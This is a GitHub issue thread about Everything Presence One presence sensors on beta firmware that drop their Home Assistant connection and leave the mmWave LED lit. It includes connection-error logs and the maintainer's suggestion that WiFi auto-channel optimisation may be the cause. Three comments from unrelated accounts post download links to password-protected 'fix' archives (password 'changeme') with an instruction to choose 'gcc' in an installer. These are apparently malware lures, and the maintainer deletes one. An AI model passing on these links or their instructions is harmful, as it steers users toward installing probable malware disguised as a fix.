EverythingSmartHome/everything-presence-one #221: EP1 frequent disconnects causing mmWave LED to stay on

iCSpotRun, 2024-08-27:
I updated a couple of sensors from Stable to Beta via USB and now frequently get HA Warnings that don't seem to impact the functionality of the EP1, but do cause the mmWave LED to toggle `on` and stay `on` even though the switch is `off` in the UI. I have to toggle the UI switch `on` -> `off` and `on` again in order to get the LED to stay `off`.

Method to update to Beta: I removed the Stable build devices via HA UI beforehand, then updated via USB and added them as new devices in HA. I re-flashed one sensor hoping it would help, but the same warning continues to appear. I don't have ESP Home installed, and I'm on HA 2024.8.3 but this issue persisted in prior versions too.

As a test, I did the same on a completely different HA system/location and with completely different network architecture, and observed the same issue.

I have very robust WiFi in the home. The EP1's are on a dedicated 2.4 GHz radio and I'd say the average signal is -50 dBm at any point in the home, so I do not think this is a network issue. Also, this issue is not present in my sensors that are still on Stable.

Various issues reported:

```
Logger: aioesphomeapi.connection
Source: runner.py:190
First occurred: 4:13:53 AM (1 occurrences)
Last logged: 4:13:53 AM

everything-presence-one-8e6950 @ 10.10.100.199: Connection error occurred: everything-presence-one-8e6950 @ 10.10.100.199: EOF received
```

... and this:

```
Logger: aioesphomeapi.reconnect_logic
Source: runner.py:190
First occurred: 4:14:53 AM (1 occurrences)
Last logged: 4:14:53 AM

Can't connect to ESPHome API for everything-presence-one-8e6950 @ 10.10.100.199: Timeout while connecting to [AddrInfo(family=<AddressFamily.AF_INET: 2>, type=<SocketKind.SOCK_STREAM: 1>, proto=6, sockaddr=IPv4Sockaddr(address='10.10.100.199', port=6053))] (TimeoutAPIError)
```

... and this:

```
Logger: aioesphomeapi.connection
Source: runner.py:190
First occurred: 3:15:29 AM (1 occurrences)
Last logged: 3:15:29 AM

everything-presence-one-f98a68 @ 10.10.0.26: Connection error occurred: [Errno 104] Connection reset by peer
```

... and this:

```
Logger: aioesphomeapi.connection
Source: runner.py:190
First occurred: 7:02:08 AM (1 occurrences)
Last logged: 7:02:08 AM

everything-presence-one-8e6950 @ 10.10.100.199: Connection error occurred: everything-presence-one-8e6950 @ 10.10.100.199: Connection lost
```

akshsekhr2702, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

miniMuggle, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

EverythingSmartHome, 2024-08-27:
Deleted commented that contained suspicious link without context

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

iCSpotRun, 2024-09-06:
This brief disconnections may be related to the auto-channel optimization of my WiFi network. The timing is suspect.

That said, it still activates the mmWave LED even though the toggle in HA UI is still off.

EverythingSmartHome, 2024-09-08:
Good you found a possible cause and that makes sense. I always have auto channel optimisations disabled and prefer manually setting which is why I've perhaps not noticed it.

I don't think there is anything that can be done regarding the mmWave LED flashing, it always does that when commands get sent or recieved.